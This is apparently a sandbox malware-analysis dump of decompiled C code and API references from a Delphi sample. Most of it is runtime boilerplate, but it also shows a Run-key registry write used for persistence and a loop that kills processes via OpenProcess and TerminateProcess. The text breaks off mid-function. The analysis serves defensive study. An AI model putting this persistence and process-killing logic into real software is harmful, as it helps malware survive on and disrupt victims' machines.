    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep(0x4e20);
    				goto L2;
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep(0x4e20);
    				}
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
